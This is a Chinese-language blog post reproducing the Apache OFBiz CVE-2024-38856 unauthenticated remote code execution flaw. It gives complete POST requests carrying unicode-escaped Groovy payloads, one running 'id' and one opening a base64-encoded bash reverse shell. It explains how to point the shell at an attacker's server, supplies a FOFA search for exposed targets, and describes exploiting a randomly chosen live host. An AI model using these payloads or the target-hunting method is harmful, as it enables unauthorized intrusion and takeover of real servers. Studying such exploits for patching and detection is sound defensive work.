Apache OFBiz (CVE-2024-38856) 漏洞复现

2024年8月7日18:45:53评论195 views字数 2163阅读7分12秒阅读模式

0x01漏洞描述

2024年8月，互联网上披露了Apache OFBiz 授权不当致代码执行漏洞(CVE-2024-38856)，该漏洞允许未经身份验证的远程攻击者通过特定的URL绕过安全检测机制执行恶意代码。攻击者可能利用该漏洞来执行恶意操作，包括但不限于获取敏感信息、修改数据或执行系统命令，最终可导致服务器失陷。

0x02 漏洞复现

POC如下所示：

POST /webtools/control/main/ProgramExport HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Content-Type: application/x-www-form-urlencoded groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

Apache OFBiz (CVE-2024-38856) 漏洞复现

反弹shell:  "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}".execute()将 /bin/bash -i >& /dev/tcp/127.0.0.1/8888 0>&1 中的ip改为vps的地址，端口改为监听端口，然后进行base64加密，最后对"bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}".execute()进行unicode编码

Apache OFBiz (CVE-2024-38856) 漏洞复现

构造之后的数据包如下：

POST /webtools/control/main/ProgramExport HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Content-Type: application/x-www-form-urlencoded groovyProgram=u0022u0062u0061u0073u0068u0020u002Du0063u0020u007Bu0065u0063u0068u006Fu002Cu004Cu0032u004Au0070u0062u0069u0039u0069u0059u0058u004Eu006Fu0049u0043u0031u0070u0049u0044u0034u006Du0049u0043u0039u006Bu005Au0058u0059u0076u0064u0047u004Eu0077u004Cu007Au0045u0079u004Eu0079u0034u0077u004Cu006Au0041u0075u004Du0053u0038u0034u004Fu0044u0067u0034u0049u0044u0041u002Bu004Au006Au0045u003Du007Du007Cu007Bu0062u0061u0073u0065u0036u0034u002Cu002Du0064u007Du007Cu007Bu0062u0061u0073u0068u002Cu002Du0069u007Du0022u002Eu0065u0078u0065u0063u0075u0074u0065u0028u0029

0x03 过程截图

fofa：app="Apache_OFBiz"影响版本：Apache OFBiz <= 18.12.14

随机找一个，页面如下：

Apache OFBiz (CVE-2024-38856) 漏洞复现

使用poc执行id命令：

Apache OFBiz (CVE-2024-38856) 漏洞复现

反弹shell：

Apache OFBiz (CVE-2024-38856) 漏洞复现

成功获取权限：

Apache OFBiz (CVE-2024-38856) 漏洞复现

原文始发于微信公众号（爱喝酒烫头的曹操）：Apache OFBiz (CVE-2024-38856) 漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Apache OFBiz (CVE-2024-38856) 漏洞复现

CVE-2025-22457：基于堆栈的远程缓冲区溢出的POC验证脚本

Kubernetes CVE-2025-1974 RCE POC

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

发表评论

在线咨询

微信